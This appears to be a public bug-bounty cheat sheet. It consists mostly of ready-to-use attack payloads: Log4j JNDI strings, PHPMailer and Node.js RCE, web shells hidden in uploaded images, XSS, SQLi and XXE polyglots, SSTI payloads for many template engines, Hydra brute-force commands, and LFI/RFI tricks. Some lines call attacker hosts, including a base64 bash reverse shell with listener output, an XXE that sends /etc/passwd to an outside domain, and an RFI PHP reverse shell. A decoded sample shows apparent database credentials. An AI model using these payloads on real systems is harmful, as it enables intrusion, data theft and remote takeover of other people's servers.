just a part of my private notes - public

just a part of my private notes - public

This repo is no more maintained by myself 😕

<img src=x onerror=alert('I hope you will find something helpful here :)')>

Payloads

Log4j

${jndi:ldap://xxxxx.burpcollaborator.net/a}

":-" notation

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}

Unicode Characters (JSON REST API request)

${\u006a\u006e\u0064\u0069:ldap://somesitehackerofhell.com/z}

"::-" notation

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}

JSON

`bypass admin login on sql misconfig`

POST /api/login HTTP/1.1
Host: vuln-web.io
[...]

{"username":"admin","password":{"password": 1}}

RCE

PHPMailer

`CVE-2016-10033: PHPMailer RCE Exploitation`

The exploitation of this issue is done in two steps:

Create a file with a PHP extension in the web root of the server.
Access the newly created file.

To create the file, you can inject some extra-arguments to the command as part of the email address:

"[email protected]\" -oQ/tmp/ -X/var/www/shell.php  root"@127.0.0.1

This will allow us to create the file /var/www/shell.php. To get code execution, we also need to inject a web shell in the email's body:

<?php system($_GET['x']);?>

Finally, you need to access your web shell to execute commands using the x parameter.

Node.js

`node.js calculate() rce with json body`

POST /api/activity HTTP/1.1
Host: vuln-web.io
[...]

{"activity":"sleep'+(global.process.mainModule.require('child_process').execSync('sleep 10'))+'","health":"63","weight":"42","happiness":"56"}

One liner BugBounty

XSS finder

waybackurls test.com | tee test.com-urls.txt | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><svg/onload=confirm(1)>' | tee combinedfuzz.json && cat combinedfuzz.json | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<svg/onload=confirm(1)>" && echo -e "$host \e[31m Vulnerable\n" || echo -e "$host \e[32m Not Vulnerable\n";done

CMS exploitation

Wordpress

basic enumeration on `xmlrpc.php` file - (if enabled)

list all methods

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

send a pingback request

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://hash.burpcollaborator.net</string></value>
</param><param><value><string>http://vulnerable-site.com</string>
</value></param></params>
</methodCall>

username & password bruteforce

<?xml version="1.0" encoding="UTF-8"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>\{\{your username\}\}</value></param> 
<param><value>\{\{your password\}\}</value></param> 
</params> 
</methodCall>

Basic Enumeration

Find Subdomains

`wfuzz`

sudo wfuzz -c -f sub-fighter.txt -Z -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --sc 200,202,204,301,302,307,403 <targetURL>

Now you may get a ton of output that shows valid subdomains depending on how the site is configured. If you notice a large amount of results that contain the same word count, this may just be an indication that the site returns a 200 response, but it just displays a “Not found” error.

To remove results with a specific word count, you can append your command w/ --hw <value>. For example, our new command that removes results that respond a word count of 290 would look like the following:

wfuzz -c -f sub-fighter -w top5000.txt -u 'http://target.tld' -H "Host: FUZZ.target.tld" --hw 290

`sublist3r`

with sublist3r it is simple as

sublist3r -d <domian name>

`gobuster`

dns

gobuster dns -d erev0s.com -w awesome_wordlist.txt -i

vhost

gobuster vhost -u erev0s.com -w awesome_wordlist.txt -v

DNS enumeration

amass -active -brute -o hosts.txt -d yahoo.com

Brute Force

Hydra

Hydra Password Cracking Cheetsheet

The following table uses the $ip variable which can be set with the following command:

export ip <target-ip>

Command	Description
`hydra -P password-file.txt -v $ip snmp`	Hydra brute force against SNMP
`hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp`	Hydra FTP known user and rockyou password list
`hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`	Hydra SSH using list of users and passwords
`hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh`	Hydra SSH using a known password and a username list
`hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt`	Hydra SSH Against Known username on port 22
`hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`	Hydra POP3 Brute Force
`hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`	Hydra SMTP Brute Force
`hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`	Hydra attack http get 401 login with a dictionary
`hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`	Hydra attack Windows Remote Desktop with rockyou
`hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb`	Hydra brute force SMB user with rockyou:
`hydra -l admin -P /usr/share/wordlists/rockyou.txt http-form-post "/login.php:username=^USER^&password=^PASS^:Invalid Username"`	Hydra brute force a Wordpress admin login
`hydra -L usernames.txt -P passwords.txt $ip smb -V -f`	SMB Brute Forcing
`hydra -L users.txt -P passwords.txt $ip ldap2 -V -f`	LDAP Brute Forcing

Polyglot payloads

XSS polyglot

%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1)>

" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

SQLi polyglot

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/

IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

JS/URL polyglot

data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}

Cookie hacking

JWT follow the following pattern:

Base64(Header).Base64(Data).Base64(Signature)

JWT secret bruteforce (crack)

`hashcat`

hashcat -a 0 -m 16500 <YOUR-JWT> /opt/web/wordlist/jwt-secrets.txt

`jwt-tool`

jwt-tool <YOUR-JWT> -C -d /opt/web/wordlist/jwt-secrets.txt

Tamper jwt token content

jwt-tool <YOUR-JWT> -S hs256 -p "secret1" -T

Bypass technics

Bypass File Upload Filtering

.giffile header

GIF89a;

<?php
system($_GET['cmd']);
?>

exiftool

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' evil.jpg

mv evil.jpg evil.php.jpg

magic header

head -c 20 example.png > magic.php && echo "<?php system($_GET['cmd']);?>" >> magic.php

Bypass 401/403

Try differnet verbs to access the file-> `GET`, `HEAD`, `POST`, `PUT`, `DELETE`, `CONNECT`, `OPTIONS`, `TRACE`, `PATCH`, `INVENTED`, `HACK`

GET /api/getUser --> 403
GET / + X-Original-URL : /api/GetUser --> 200

GET /api/getUser --> 403
GET / + Referer : https://site.com/api/GetUser --> 200
or
GET /api/getUser + Referer : https://site.com/api/GetUser --> 200

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1

curl -H "Content-Length:0" -X POST https://example.com

Bypass 429

Rate Limiting Bypass : `429 Too many Requests`

Append the headers to a request where the server is responding with `429`

Client-Ip: [random-ip] -> 200
X-Client-Ip: [random-ip] -> 200
X-Forwarded-For: [random-ip] -> 200
X-Forwarded-For: 127.0.0.1 -> 200

Bypass password reset

Include controlled mail as a second parameter
Bruteforce reset token
Try to use a reset token on another account
Try to figure out how token are generated

Bypass LFI WAF

If the WAF blocks you from reading /etc/passwd directly, you can use ? to bypass it.

curl http://vulnerable-web.io/read.php?filename=/etc/passwd -i
HTTP/1.1 403 Forbidden
[...]

curl http://vulnerable-web.io/read.php?filename=/??c/?as?wd -i
HTTP/1.1 200 OK
[...]
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Open web redirect

Open web redirect common payloads

/%09/example.com
/%2f%2fexample.com
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
////%09/example.com
////%5cexample.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
///\;@example.com
///example.com
///example.com/
//google.com/%2f..
//[email protected]/%2f..
///google.com/%2f..
///[email protected]/%2f..
////google.com/%2f..
////[email protected]/%2f..
https://google.com/%2f..
https://[email protected]/%2f..
/https://google.com/%2f..
/https://[email protected]/%2f..
//www.google.com/%2f%2e%2e
//[email protected]/%2f%2e%2e
///www.google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////www.google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e

source

XSS

Common payloads

<img src=x>
<script>alert('XSS')</script>
"><script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>

XSS to LFI

most common payloads

<script>

<script>
    x=new XMLHttpRequest;
    x.onload=function(){
        document.write(this.responseText)
    };
    x.open("GET","file:///etc/passwd");
    x.send();
</script>

<iframe>

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

<script> and <iframe> with document.write

<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>

Top XSS dorks

?q={payload}
?s={payload}
?search={payload}
?id={payload}
?lang={payload}
?keyword={payload}
?query={payload}
?page={payload}
?keywords={payload}
?year={payload}
?view={payload}
?email={payload}
?type={payload}
?name={payload}
?p={payload}
?month={payload}
?immagine={payload}
?list_type={payload}
?url={payload}
?terms={payload}
?catagortid={payload}
?key={payload}
?l={payload}
?begindate={payload}
?enddate={payload}

XXE common payloads

XXE: read local files

linux

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

windows

 <?xml version = "1.0"?>
 <!DOCTYPE replace [<!ENTITY exploit SYSTEM "file:///windows/win.ini"> ]>
<order>
 <quantity>1</quantity>
 <item>
&exploit;
</item>
 <address>USA</address>
 </order>

If the output of the win.ini file on the target returns the response message, then it proves that the XML External Entity vulnerability is present.

use replace funtion if case sensitive

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY exploit SYSTEM "file:///etc/passwd"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&exploit;</lastName>
</userInfo>

XXE - Out-of-band - payloads

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]>

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
]>

Send the content of `/etc/passwd` to `www.akr3ch.com`, you may receive only the first line.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callme SYSTEM "www.akr3ch.com/?%xxe;">
]
>
<foo>&callme;</foo>

XXE file read via XInclude payload as parameter value

`payload`

<akrech xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></akrech>

`url encoded payload`

%3c%66%6f%6f%20%78%6d%6c%6e%73%3a%78%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%49%6e%63%6c%75%64%65%22%3e%0d%0a%3c%78%69%3a%69%6e%63%6c%75%64%65%20%70%61%72%73%65%3d%22%74%65%78%74%22%20%68%72%65%66%3d%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%2f%3e%3c%2f%66%6f%6f%3e

`Request demo`

POST /product/stock HTTP/1.1
Host: web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
...
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

productId=%3c%66%6f%6f%20%78%6d%6c%6e%73%3a%78%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%49%6e%63%6c%75%64%65%22%3e%0d%0a%3c%78%69%3a%69%6e%63%6c%75%64%65%20%70%61%72%73%65%3d%22%74%65%78%74%22%20%68%72%65%66%3d%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%2f%3e%3c%2f%66%6f%6f%3e&storeId=1

`Response demo`

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 1279

"Invalid product ID: 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin

XXE to RCE

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY exploit SYSTEM "expect://id"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&exploit;</lastName>
</userInfo>

XXE to SSRF

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XXE inside SVG

RCE

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
    <image xlink:href="expect://id"></image>
</svg>

LFI

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

source

Exploitable Protocols

File: could be used to read local file on the server

file:///etc/passwd

HTTP(s): useful in OOB Data Exfiltration

http(s)://securityidiots.com/lol.xml

FTP: useful in OOB Data Exfiltration & hitting the internal FTP service which is behind NAT

ftp://securityidiots.com/lol.xml

SFTP: hitting the internal SFTP service which is behind NAT

sftp://securityidiots.com:11111/

TFTP: hitting the internal TFTP service which is behind NAT

tftp://securityidiots.com:12346/lol.xml

DICT : could also be used to make requests to internal services

dict://ip:22/_XXX

dict://ip:6379/_XXX

NETDOC: This could be used as an alternative to file in JAVA based Servers.

netdoc:/etc/passwd

LDAP: could be used to query internal LDAP Service.

ldap://localhost:11211/%0astats%0aquit

GOPHER:

gopher://<host>:<port>/_<gopher-path>

gopher://<host>:25/%0AHELO ... (executing commands on internal SMTP Service)

Making internal HTTP Requests(GET,POST..etc):

gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A

gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body

PHP: if PHP is installed we can use PHP Wrappers to read PHP source codes as Base64 content.

php://filter/convert.base64-encode/resource=index.php

Data:

data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk

Server Side Template Injection (SSTI)

SSTI CheatSheet

`Polyglot`

${{<%[%'"}}%\

`FreeMarker (Java)`

${7*7} = 49
<#assign command="freemarker.template.utility.Execute"?new()> ${ command("cat /etc/passwd") }

`Java`

${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.html").getContent()}
${T(java.lang.System).getenv()}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}

`Golang`

{{ . }}
{{.Email}}
{{.Password}}
{{ .system "id" }}

`Twig (PHP)`

{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}

`Smarty (PHP)`

{$smarty.version}
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

`Handlebars(NodeJS)`

wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

`Velocity`

#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end

`ERB (Ruby)`

<%= system("whoami") %>
<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>

`Django Tricks (Python)`

{% debug %}
{{settings.SECRET_KEY}}

`Tornado (Python)`

{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

`Mojolicious (Perl)`

<%= perl code %>
<% perl code %>

`Flask/Jinja2: Identify`

{{ '7'*7 }}
{{ [].class.base.subclasses() }} # get all classes
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}

`Flask/Jinja2`

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ get_flashed_messages.__globals__.__builtins__.open(“/etc/passwd”).read() }}

`Jade`

#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}

`Razor (.Net)`

@(1+2)
@{// C# code}

SSTI to reverse shell

[1] Try this, everywhere the app is taking input from the user and reflecting the output.

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
{{config}}

[2] if the app reflects the output as `49`.Then there might be a RCE possible.

[3] now encode the payload in basse64.

input

echo 'bash -i >& /dev/tcp/LHOST/4444 0>&1' | base64

output

c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTA4LzQ0NDQgMD4mMQo=

[4] now start a listener

nc -lvvp 4444

[5] resend the request with this command

{{config.__class__.__init__.__globals__['os'].popen('echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTA4LzQ0NDQgMD4mMQo=${IFS}|base64${IFS}-d|bash').read()}}

[6] if everything works currectly. You should get a reverse shell.

nc -vv -lnp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.130.
Ncat: Connection from 10.10.11.130:54434.
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

[+] or we can try those above commands also, if the previous one doesn't works.

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

{{ namespace.__init__.__globals__.os.popen('id').read() }}

{{ "foo".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("id").read()}}

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}

`bypass common WAF`

{%25+include+request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("sleep+5")|attr("read")()+%}

SSRF common payloads

http://127.0.0.1:80

http://127.0.0.1:443

http://127.0.0.1:22

http://0.0.0.0:80

http://0.0.0.0:443

http://0.0.0.0:22

CSRF common payloads

On click submit - HTML GET

<a href="http://www.example.com/api/setusername?username=CSRF">Click Me</a>

Auto submit - HTML GET

<img src="http://www.example.com/api/setusername?username=CSRF">

On click submit - HTML POST

<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
 <input name="username" type="hidden" value="CSRF" />
 <input type="submit" value="Submit Request" />
</form>

Auto submit - HTML POST

<form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
 <input name="username" type="hidden" value="CSRFd" />
 <input type="submit" value="Submit Request" />
</form>
 
<script>
 document.getElementById("autosubmit").submit();
</script>

JSON GET

<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.example.com/api/currentuser");
xhr.send();
</script>

JSON POST

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
//application/json is not allowed in a simple request. text/plain is the default
xhr.setRequestHeader("Content-Type", "text/plain");
//You will probably want to also try one or both of these
//xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
//xhr.setRequestHeader("Content-Type", "multipart/form-data");
xhr.send('{"role":admin}');
</script>

source

CRLF common payloads

Add a cookie

request

http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue

response

Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Location: https://www.example.net/[INJECTION STARTS HERE]
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=block

XSS bypass

http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

HTML

http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E

UTF-8 encoded payload

%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE

Remote File Inclusion (RFI)

Common payloads

php:expect://id

php:expect://whoami

Remote file inclusion uses pretty much the same vector as local file inclusion.

A remote file inclusion vulnerability lets the attacker execute a script on the target-machine even though it is not even hosted on that machine.

RFI's are less common than LFI. Because in order to get them to work the developer must have edited the php.ini configuration file.

This is how they work.

So you have an unsanitized parameter, like this

$incfile = $_REQUEST["file"];
include($incfile.".php");

Now what you can do is to include a file that is not hosted on the victim-server, but instead on the attackers server.

http://exampe.com/index.php?page=http://attackerserver.com/evil.txt

And evil.txt will look like something like this:

<?php echo shell_exec("whoami");?>

Or just get a reverse shell directly like this:

<?php echo system("0<&196;exec 196<>/dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?>

So when the victim-server includes this file it will automatically execute the commands that are in the evil.txt file. And we have a RCE. Avoid extentions

Remember to add the nullbyte %00 to avoid appending .php. This will only work on php before version 5.3.

If it does not work you can also add a ?, this way the rest will be interpreted as url parameters.

Local file inclusion (LFI) payloads

normal

../../../../../../etc/passwd

....//....//....//....//....//etc/passwd

double url encoding

..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd

with Unicode charecters

..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8etc/passwd

You can also try to use those insted of /etc/passwd

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/var/log/apache2/access.log
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/<site-from-000-df-comment>
/var/www/wordpress/wp-config.php
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled

LFI examples

akech.xyz/index.php?token=/etc/passwd%00

akrech.xyz/index.php?page=../../../../../../etc/passwd

http://www.test.com.ar/main.php?pagina=data:text/plain,<?system($_GET['x']);?>&x=ls

http://www.test.com.ar/main.php?pagina=data:,<?system($_GET['x']);?>&x=ls

http://www.test.com.ar/main.php?pagina=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls

PHP filters

php://filter/convert.base64-encode/resource=

php://filter/read=string.rot13/resource=

example input:

example.com/index.php?page=php://filter/read=string.rot13/resource=index.php

example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

example output:

PD9waHAKJGRiX25hbWU9ImJpaHRhcHViX2RiIjsKaWYoJF9TRVJWRVJbIlNFUlZFUl9BRERSIl09PSIxMjcuMC4wLjEiKQoJJGNvbj1teXNxbF9jb25uZWN0KCJsb2NhbGhvc3QiLCJyb290IiwiIik7CmVsc2UKCSRjb249bXlzcWxfY29ubmVjdCgibG9jYWxob3N0IiwiYmlodGFwdWJfYWRtaW4iLCJCUFNAMjAxMyIpOwppZighJGNvbikKCXsKCWRpZSgiRXJyb3IgaW4gY29ubmVjdGlvbiIubXlzcWxfZXJyb3IoKSk7Cgl9Cm15c3FsX3NlbGVjdF9kYigiJGRiX25hbWUiKW9yIGRpZSgiY2Fubm90IHNlbGVjdCBEQiIpOwo/

decode

<?php
$db_name="bihtapub_db";
if($_SERVER["SERVER_ADDR"]=="127.0.0.1")
   $con=mysql_connect("localhost","root","");
else
   $con=mysql_connect("localhost","bihtapub_admin","BPS@2013");
if(!$con)...
.
.
?>

SQL injection payload list

Generic SQL Injection Payloads

'
''
' or "
-- or # 
' OR '1
' OR 1 -- -
'or 1=1 -- -
" OR "" = "
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00

MySQL

Command	Description
General
`mysql -u root -h examle.com -P 3306 -p`	login to mysql database
`SHOW DATABASES`	List available databases
`USE users`	Switch to database
Tables
`CREATE TABLE logins (id INT, ...)`	Add a new table
`SHOW TABLES`	List available tables in current database
`DESCRIBE logins`	Show table properties and columns
`INSERT INTO table_name VALUES (value_1,..)`	Add values to table
`INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)`	Add values to specific columns in a table
`UPDATE table_name SET column1=newvalue1, ... WHERE <condition>`	Update table values
Columns
`SELECT * FROM table_name`	Show all columns in a table
`SELECT column1, column2 FROM table_name`	Show specific columns in a table
`DROP TABLE logins`	Delete a table
`ALTER TABLE logins ADD newColumn INT`	Add new column
`ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn`	Rename column
`ALTER TABLE logins MODIFY oldColumn DATE`	Change column datatype
`ALTER TABLE logins DROP oldColumn`	Delete column
Output
`SELECT * FROM logins ORDER BY column_1`	Sort by column
`SELECT * FROM logins ORDER BY column_1 DESC`	Sort by column in descending order
`SELECT * FROM logins ORDER BY column_1 DESC, id ASC`	Sort by two-columns
`SELECT * FROM logins LIMIT 2`	Only show first two results
